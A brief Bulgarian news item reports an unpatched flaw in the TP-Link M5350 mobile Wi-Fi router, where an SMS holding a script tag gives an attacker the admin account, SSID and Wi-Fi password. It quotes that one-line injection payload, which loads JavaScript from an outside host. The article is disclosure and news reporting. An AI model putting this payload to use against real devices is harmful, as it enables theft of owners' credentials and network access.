Популярно устройство на известната компания TP-Link може да бъде пробито с изпращането на един SMS. Уязвимостта засяга модела M5350 3G Mobile Wi-Fi, който е сравнително разпространен, защото някои мобилни оператори го предлагат на своите клиенти заедно с тяхна SIM карта. Оказва се, че ако към маршрутизатора се изпрати късо съобщение, съдържащо скрипта:
<script src=//n.ms/a.js></script>
|
недоброжелател с лекота ще получи достъп до администраторския акаунт на устройството, идентификатора на безжичната мрежа (SSID) и паролата на Wi-Fi мрежата.
Засега няма решение за тази уязвимост, но за щастие тя не е толкова лесна за експлоатиране. Все пак, за да се приложи е нужно недоброжелателят да знае телефонния номер на SIM картата.